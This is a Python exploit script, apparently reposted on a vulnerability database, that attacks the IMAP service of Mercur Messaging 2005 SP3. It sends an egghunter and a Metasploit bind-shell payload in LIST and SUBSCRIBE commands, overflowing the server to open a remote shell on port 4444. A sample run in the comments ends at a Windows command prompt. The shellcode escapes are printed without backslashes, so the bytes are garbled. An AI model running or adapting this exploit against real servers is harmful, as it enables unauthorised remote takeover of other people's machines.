#!/usr/bin/python # # Mercur Messaging 2005 SP3 IMAP service - Egghunter mod # muts@offensive-security.com # http://www.offensive-security.com # Original exploit by Winny Thomas # Thanks Thomas, this code really came in handy ! # VMWare seems to alter the stack a bit as the offset # of the EIP overwrite was a few bytes off (Windows XPsp2). # You can inject more than 2000 bytes using an IMAP command (I chose LIST), # and then let the egghunter do the rest of the work. # The initial injected buffer gets cut off, so you need to double check that. # # bt ~ # ./imap.py 192.168.0.75 test test # * OK MERCUR IMAP4-Server (v5.00.14 Unregistered) for Windows ready at Thu, 22 Mar 2007 00:59:19 +0200 # a001 OK LOGIN completed # BAD Command unknown # Shell on port 4444 # # bt ~ # nc -v 192.168.0.75 4444 # 192.168.0.75: inverse host lookup failed: Unknown host # (UNKNOWN) [192.168.0.75] 4444 (krb524) open # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:WINDOWSsystem32> import os import sys import time import socket import struct # Place our w00tw00t egghunter in nop heaven shellcode = \"x90\" * 92 shellcode +=\"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7\" shellcode +=\"x90\" * 100 # Place w00t and bindshell in correct place in LIST command. bindshell = \"x90\" * 320 bindshell +=\"x54x30x30x57x54x30x30x57\" # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com bindshell +=(\"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49\" \"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36\" \"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34\" \"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41\" \"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e\" \"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58\" \"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47\" \"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58\" \"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38\" \"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a\" \"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30\" \"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57\" \"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58\" \"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30\" \"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c\" \"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44\" \"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50\" \"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f\" \"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33\" \"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f\" \"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f\" \"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50\" \"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d\" \"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45\" \"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f\" \"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38\" \"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55\" \"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d\" \"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d\" \"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38\" \"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35\" \"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37\" \"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56\" \"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56\" \"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54\" \"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54\" \"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53\" \"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51\" \"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35\" \"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35\" \"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c\" \"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f\" \"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f\" \"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e\" \"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a\") # Pad the injected command bindshell +=\"xcc\" * 1000 def ExploitMercur(target, username, passwd): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, 143)) response = sock.recv(1024) print response login = \'a001 LOGIN \' + username + \' \' + passwd + \' \' sock.send(login) response = sock.recv(1024) print response imaplist = \'a001 LIST \' + bindshell + \' \' sock.send(imaplist) response = sock.recv(1024) print response payload = shellcode payload += \'L\' * 1 payload += \'Y\' * 4 payload += \'Z\' * 4 # 01883A50 FFD3 CALL EBX MCRFAX.DLL payload += struct.pack(\'<L\', 0x01883A50) payload += \'L\' * 27 payload += \'M\' * 16 payload += \' \' + \'\"/\"\' + \' \' + \'\"\"\' req = \'a001 SUBSCRIBE \' + payload + \' \' sock.send(req) sock.close() print \'Shell on port 4444\' def ConnectRemoteShell(target): connect = \"/usr/bin/telnet \" + target + \" 4444\" os.system(connect) if __name__==\"__main__\": try: target = sys.argv[1] username = sys.argv[2] passwd = sys.argv[3] except IndexError: print \'Usage: %s <imap server> <username> <password> \' % sys.argv[0] sys.exit(-1) ExploitMercur(target, username, passwd)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论